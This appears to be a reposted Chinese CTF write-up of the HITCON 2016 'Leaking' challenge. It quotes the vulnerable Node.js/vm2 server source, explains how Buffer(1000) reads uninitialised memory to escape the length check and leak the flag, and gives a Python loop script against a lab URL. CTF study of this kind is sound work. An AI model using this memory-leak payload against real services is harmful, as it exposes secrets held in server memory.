[HITCON 2016]Leaking沙箱逃逸学习
生活随笔
收集整理的這篇文章主要介紹了
[HITCON 2016]Leaking沙箱逃逸学习
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
[HITCON 2016]Leaking沙箱逃逸學(xué)習(xí)
node.js 里提供了 vm 模塊,相當(dāng)于一個(gè)虛擬機(jī),可以讓你在執(zhí)行代碼時(shí)候隔離當(dāng)前的執(zhí)行環(huán)境,避免被惡意代碼攻擊。但是這道題比較有意思
考點(diǎn)是:
首先給出了題目的源碼
"use strict";var randomstring = require("randomstring"); var express = require("express"); var {VM } = require("vm2"); var fs = require("fs");var app = express(); var flag = require("./config.js").flagapp.get("/", function(req, res) {res.header("Content-Type", "text/plain");/* Orange is so kind so he put the flag here. But if you can guess correctly :P */eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")if (req.query.data && req.query.data.length <= 12) {var vm = new VM({timeout: 1000});console.log(req.query.data);res.send("eval ->" + vm.run(req.query.data));} else {res.send(fs.readFileSync(__filename).toString());} });app.listen(3000, function() {console.log("listening on port 3000!"); });我們把關(guān)鍵幾行代碼列出來
eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";") eval就是把里面的當(dāng)作javascript語句來運(yùn)行 var vm = new VM({timeout: 1000});console.log(req.query.data);res.send("eval ->" + vm.run(req.query.data)); 然后要Get傳遞一個(gè)data參數(shù),將它放在vm2創(chuàng)建的沙盒中運(yùn)行,并且對傳入的參數(shù)長度進(jìn)行了限制,不超過12,這里可以用數(shù)組繞過解題所需知識(shí)
在較早一點(diǎn)的node.js版本中 (8.0 之前),當(dāng) Buffer 的構(gòu)造函數(shù)傳入數(shù)字時(shí), 會(huì)得到與數(shù)字長度一致的一個(gè) Buffer,并且這個(gè) Buffer 是未清零的。8.0 之后的版本可以通過另一個(gè)函數(shù) Buffer.allocUnsafe(size) 來獲得未清空的內(nèi)存。如果使用new Buffer(size)或其別名Buffer(size))創(chuàng)建,則對象不會(huì)填充零,而只要是調(diào)用過的變量,一定會(huì)存在內(nèi)存中,所以需要使用Buffer()來讀取內(nèi)存,使用data=Buffer(1000)分配一個(gè)1000的單位為8位字節(jié)的buffer,因此很容易得到姿勢
import requests url = 'http://bcd330df-99ca-4b90-a33c-1cca550c2d15.node3.buuoj.cn/?data=Buffer(1000)' response = '' while 'flag' not in response:req = requests.get(url)response = req.textprint(req.status_code)if 'flag{' in response:print(response)break總結(jié)
以上是生活随笔為你收集整理的[HITCON 2016]Leaking沙箱逃逸学习的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: ospf协议基本概念
- 下一篇: Failed to evaluate m